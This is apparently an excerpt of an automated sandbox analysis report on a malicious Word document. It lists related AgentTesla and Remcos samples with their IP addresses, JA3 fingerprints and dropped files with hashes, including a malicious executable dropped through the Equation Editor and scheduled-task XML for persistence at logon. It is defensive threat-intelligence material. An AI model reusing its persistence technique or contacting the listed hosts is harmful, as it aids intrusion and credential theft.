                                                                                      SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.26.12.205
                                                                                      PUBLIC-DOMAIN-REGISTRYUSQuote.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.223
                                                                                      SecuriteInfo.com.Heur.15333.25205.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.198.143
                                                                                      DOCUMENTS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.222.226.100
                                                                                      Cleared Payment.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.223
                                                                                      Quote.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.225
                                                                                      Quotation 0048484.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.225
                                                                                      SecuriteInfo.com.Win32.PWSX-gen.28055.17747.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.222.226.100
                                                                                      Fsd5TmAZfy.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.198.143
                                                                                      SHIPPING ORDER.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 162.222.226.100
                                                                                      MV SUN OCEAN BUNKER INV.docGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.91.199.224

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      7dcce5b76c8b17472d024758970a406byDOZ8nTvm8.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.21.83.128
                                                                                      DETAILS.docx.docGet hashmaliciousRemcosBrowse
                                                                                      • 104.21.83.128
                                                                                      R1iBOIfySQ.xlsxGet hashmaliciousHidden Macro 4.0Browse
                                                                                      • 104.21.83.128
                                                                                      msXkgFIUyS.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.21.83.128
                                                                                      L2165c5ZiO.rtfGet hashmaliciousRemcosBrowse
                                                                                      • 104.21.83.128
                                                                                      Qzr31SUgrS.rtfGet hashmaliciousRemcosBrowse
                                                                                      • 104.21.83.128
                                                                                      mrOdyevwvZ.rtfGet hashmaliciousUnknownBrowse
                                                                                      • 104.21.83.128
                                                                                      OFFER DETAIL 75645.xlsGet hashmaliciousRemcosBrowse
                                                                                      • 104.21.83.128
                                                                                      P.O.109961.xlsGet hashmaliciousRemcosBrowse
                                                                                      • 104.21.83.128
                                                                                      MV SUN OCEAN BUNKER INV.docGet hashmaliciousAgentTeslaBrowse
                                                                                      • 104.21.83.128

                                                                                      Dropped Files

                                                                                      No context

                                                                                      Created / dropped Files

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):64
                                                                                      Entropy (8bit):0.34726597513537405
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Nlll:Nll
                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                      Malicious:false
                                                                                      Reputation:high, very likely benign file
                                                                                      Preview:@...e...........................................................

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\JBNvj66BwYU3yCv[1].scr

                                                                                      Download File
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):722440
                                                                                      Entropy (8bit):7.916807713584016
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:5rOrr4PrrF4LtCVp0Vk1zlFrhHn6SvUyma5+2wqxsKoLlD5fRXj+9Y/6wuz/CkR:pDimlFrhH6IUzBqxdEtRXa9Y/huz/x
                                                                                      MD5:60E4F25FA64A0EF31AC57663A26DA790
                                                                                      SHA1:26126C700F70DE2E42A173214B52FE6A38C93BB8
                                                                                      SHA-256:F2664BDFD035D146843F1575528EB9694A98B32F99488058A0E04885AD62E9C2
                                                                                      SHA-512:31D2C6284375E7A089216FBA4EC7DC424ACE8FB5AE5D5EE620974831C73386D9F360CBC06CBE696579B27EA442A8141A1DFEC502AA7CDE1D623F74D2F5BD2BDF
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                      • Antivirus: Virustotal, Detection: 63%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t..f................................. ........@.. ....................... ............@.....................................S........................6........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......HS..P............................................................0..A....... .........%.[...(.....\... |........%.k...(.....l...(....*.....&*...B... ....(......*....0..............,.".".#..(....+...*..0...............".".#. ....(....+...*...0...............".".#...(....+...*..0...................... ....(....+...*..0..+.....................(P...+....s....}......j}....*..0............{......*...0..Q..........E........ ... .......+.............{.....(h.......,...+..+...

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{3CFC4CBC-CC73-4F84-AD38-3C803376DE7D}.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):16384
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3::
                                                                                      MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                      SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                      SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                      SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CD72746F-B24F-4EC2-824D-173D2D672EC5}.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):259584
                                                                                      Entropy (8bit):3.441136173450056
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:UdecyemMdecyemMdecyemMdecyemMdecyemMdecyemyf0:Kf0
                                                                                      MD5:661DAB0C451EF472716F19530EC7387E
                                                                                      SHA1:9099C7CF37700F61A382FA21DC321F72EB7184C0
                                                                                      SHA-256:EA133F214698D5B7CE584EA6515D7C474F98720880CF87E960B43BF32D516951
                                                                                      SHA-512:78F0F404A79289CDD5734B3D3AF974E06FFA3E4204B815290F347CC8DCAF4E51DABB82505AAB293AB6935A7BCBC42AA210C6CE9216A0A381D489965BA10AA4EE
                                                                                      Malicious:false
                                                                                      Preview:0.5.2.1.2.8.0.3.D.o.c.u.m.e.n.t. .c.r.e.a.t.e.d. .i.n. .e.a.r.l.i.e.r. .v.e.r.s.i.o.n. .m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e. .w.o.r.d...T.o. .v.i.e.w. .o.r. .e.d.i.t. .t.h.i.s. .d.o.c.u.m.e.n.t.,. .p.l.e.a.s.e. .c.l.i.c.k. .(.".E.n.a.b.l.e. .e.d.i.t.i.n.g.".). .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e.A.S.S.I.G.N.M.E.N.T.M.C.S. .4.7.3.:. .M.A.R.K.E.T.I.N.G. .M.A.N.A.G.E.M.E.N.T. .&. .S.T.R.A.T.E.G.Y.S.T.U.D.E.N.T. .N.A.M.E.:. .F.r.a.n.k. .H.u.t.t.o.n.S.T.U.D.E.N.T. .N.o.:. .2.0.7.2.4.4.1.4.I.N.D.E.X. .N.o.:. .5.0.5.6.1.2.0.C.E.N.T.R.E.:. .G.R.E.E.N.F.I.E.L.D.S.1... .i... .G.u.e.r.i.l.l.a. .m.a.r.k.e.t.i.n.g. .s.t.r.a.t.e.g.y. .r.e.f.e.r.s. .t.o. .a. .s.u.r.p.r.i.s.i.n.g. .a.d.v.e.r.t.i.s.i.n.g. .s.t.r.a.t.e.g.y. .a.n.d. .w.i.t.h. .u.n.c.o.n.v.e.n.t.i.o.n.a.l. .i.n.t.e.r.a.c.t.i.o.n.s. .t.o. .p.r.o.m.o.t.e. .t.h.e. .p.r.o.d.u.c.t.s. .a.n.d. .s.e.r.v.i.c.e.s... .G.u.e.r.i.l.l.a. .m.a.r.k.e.t.i.n.g. .s.t.r.a.t.e.g.y. .i.s. .p.u.b.l.i.c.i.t.y. .p.r.a.c.t.i.c.e.s.,. .l.o.w.-.c.o.s.t. .

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{DBF5DE36-20E6-4ABC-A935-FF242E1062DB}.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1536
                                                                                      Entropy (8bit):1.357318797251612
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbX:IiiiiiiiiifdLloZQc8++lsJe1Mzel
                                                                                      MD5:007C7383E92E5E832C5006329354E536
                                                                                      SHA1:AA82166C41540AF54FF32A08FCE85D3BA7445C92
                                                                                      SHA-256:73394EE9E05FB8B6B9783CB527256D1545CF6460068E16E8A3E4841DADAE118E
                                                                                      SHA-512:DF048BAAB6FA1B8EC9240486447FAB3CAF38A65D52AEB9DFB9DBC1FEE4A56A9E565560E5AE7B323DAF630B234F4FFFE310A13A5250BBE9DD48E87F139E622FD8
                                                                                      Malicious:false
                                                                                      Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FE2D0FDB-7F0A-4F00-BC04-18F54428C4C8}.tmp

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1024
                                                                                      Entropy (8bit):0.05390218305374581
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                      Malicious:false
                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\2e5ld3mp.01s.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\cbort3bz.v4p.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\kq40lqt5.aq3.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\mrczgnzh.lig.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\nwrfmadv.nij.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\rstwkshw.nod.ps1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\setomjxh.wux.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Local\Temp\tmp871B.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\dzoihohj75439.scr
                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):1573
                                                                                      Entropy (8bit):5.103407778758209
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt4xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTYv
                                                                                      MD5:7891DD07F858CC93F342FFECC2A15D15
                                                                                      SHA1:DFDF83865EF4070ED765FBD33CFAA33A1D1F905E
                                                                                      SHA-256:0309019F70AA5FFB9A9E78426FA5485ED7ACB30F118E10F311D9A94BAB45ABD0
                                                                                      SHA-512:509298F8D8AF6D88D56045F2CA835C4131D1BA2324CDD167539162972D297559E52ED6AC4C3EE4E187D36C06E164434FD2396EF498C57A89F2D288B512800613
                                                                                      Malicious:true
                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                      C:\Users\user\AppData\Local\Temp\tmp9A3D.tmp

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\egFUHsL.exe
                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):1573
                                                                                      Entropy (8bit):5.103407778758209
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt4xvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTYv
                                                                                      MD5:7891DD07F858CC93F342FFECC2A15D15
                                                                                      SHA1:DFDF83865EF4070ED765FBD33CFAA33A1D1F905E
                                                                                      SHA-256:0309019F70AA5FFB9A9E78426FA5485ED7ACB30F118E10F311D9A94BAB45ABD0
                                                                                      SHA-512:509298F8D8AF6D88D56045F2CA835C4131D1BA2324CDD167539162972D297559E52ED6AC4C3EE4E187D36C06E164434FD2396EF498C57A89F2D288B512800613
                                                                                      Malicious:false
                                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                                                      C:\Users\user\AppData\Local\Temp\wxypf1oa.alk.psm1

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:very short file (no magic)
                                                                                      Category:dropped
                                                                                      Size (bytes):1
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:U:U
                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                      Malicious:false
                                                                                      Preview:1

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Remittance 17042024.LNK

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:04 2023, mtime=Fri Aug 11 15:42:04 2023, atime=Thu Apr 18 07:23:49 2024, length=282583, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):1059
                                                                                      Entropy (8bit):4.5559743661939835
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:8/o72jgXg/XAlCPCHaX5B0B/Dr8xX+WNlNY3Of3+GRTjuicvbGtIvoi3+GR5DtZs:83/XTpKxOnla30v3NeaI7v5Dv3qKa7f
                                                                                      MD5:EB67002659AD1A7239F50E16C381F261
                                                                                      SHA1:A09A602F4ED10D18BBD9A60A1A7A4BE2E0717DB8
                                                                                      SHA-256:80827D5D6EB6BA2380113CC50E998AFA8E34AB42BA95EE1CA973419030A029ED
                                                                                      SHA-512:8AAD84706B5E655F7EDADA6FD28E61FC33A1B861D7D0E3CD5CD50F267FF4D7FAC13B5CDEBCC611F53529965A2D14A1B77CF6D98721817B8CB4D12B23D972712B
                                                                                      Malicious:false
                                                                                      Preview:L..................F.... ...e...r...e...r.....|.i....O...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X.B..user.8......QK.X.X.B*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..O...X.B .REMITT~1.DOC..\.......WC..WC.*.........................R.e.m.i.t.t.a.n.c.e. .1.7.0.4.2.0.2.4...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\216041\Users.user\Desktop\Remittance 17042024.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.m.i.t.t.a.n.c.e. .1.7.0.4.2.0.2.4...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......216041..........D_....3N.

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:Generic INItialization configuration [folders]
                                                                                      Category:dropped
                                                                                      Size (bytes):72
                                                                                      Entropy (8bit):4.699448571151656
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:M19MyXuSptFXVom4WyXuSptFXVov:MrMquSp9pquSp9y
                                                                                      MD5:6A97B0D4A2A4A5EA3201F7B95320F20F
                                                                                      SHA1:0042FF22429600F4F10E1B0C13514043A00CD686
                                                                                      SHA-256:4D3A7A7D885127F1EE57C57D33D6F89367524112F4E5635CBB559CE5B7FB165E
                                                                                      SHA-512:311842DD7CC6CD658B75451CA2220FDF950FFEA51081952FBD8E8D554D2B2EF073F2C86A10C8C8D7937D083EAD63808F1FF101C8F04A266B2BDB1202DE87E357
                                                                                      Malicious:false
                                                                                      Preview:[doc]..Remittance 17042024.LNK=0..[folders]..Remittance 17042024.LNK=0..

                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                      Download File
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):162
                                                                                      Entropy (8bit):2.503835550707526
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vrJlaCkWtVyaKoKbi/YYbVWNK5rAGllln:vdsCkWtzKXbigYIK++l
                                                                                      MD5:01DADEB867D8CD283A1F21D4FDF11903
                                                                                      SHA1:88993BBAA2E620D6F18682B37BCEF27BD0AE3DB4
                                                                                      SHA-256:0468E3450BF6A972B9E023034768227DC07C1FFD07C5F612FBBA187794658EE0
                                                                                      SHA-512:344243CF8AC932C4988ECB175E8ACB3A65A0092EB15CD8982925A44F75AEDF33A458C67F597F1F6D89A5F426E649F139A36D1BF31191CE54A581671EE761223F
                                                                                      Malicious:false
                                                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                      C:\Users\user\AppData\Roaming\dzoihohj75439.scr

                                                                                      Download File
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):722440
                                                                                      Entropy (8bit):7.916807713584016
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:5rOrr4PrrF4LtCVp0Vk1zlFrhHn6SvUyma5+2wqxsKoLlD5fRXj+9Y/6wuz/CkR:pDimlFrhH6IUzBqxdEtRXa9Y/huz/x
                                                                                      MD5:60E4F25FA64A0EF31AC57663A26DA790
                                                                                      SHA1:26126C700F70DE2E42A173214B52FE6A38C93BB8
                                                                                      SHA-256:F2664BDFD035D146843F1575528EB9694A98B32F99488058A0E04885AD62E9C2
                                                                                      SHA-512:31D2C6284375E7A089216FBA4EC7DC424ACE8FB5AE5D5EE620974831C73386D9F360CBC06CBE696579B27EA442A8141A1DFEC502AA7CDE1D623F74D2F5BD2BDF
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                      • Antivirus: Virustotal, Detection: 63%, Browse
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t..f................................. ........@.. ....................... ............@.....................................S........................6........................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......HS..P............................................................0..A....... .........%.[...(.....\... |........%.k...(.....l...(....*.....&*...B... ....(......*....0..............,.".".#..(....+...*..0...............".".#. ....(....+...*...0...............".".#...(....+...*..0...................... ....(....+...*..0..+.....................(P...+....s....}......j}....*..0............{......*...0..Q..........E........ ... .......+.............{.....(h.......,...+..+...

                                                                                      C:\Users\user\AppData\Roaming\egFUHsL.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Roaming\dzoihohj75439.scr
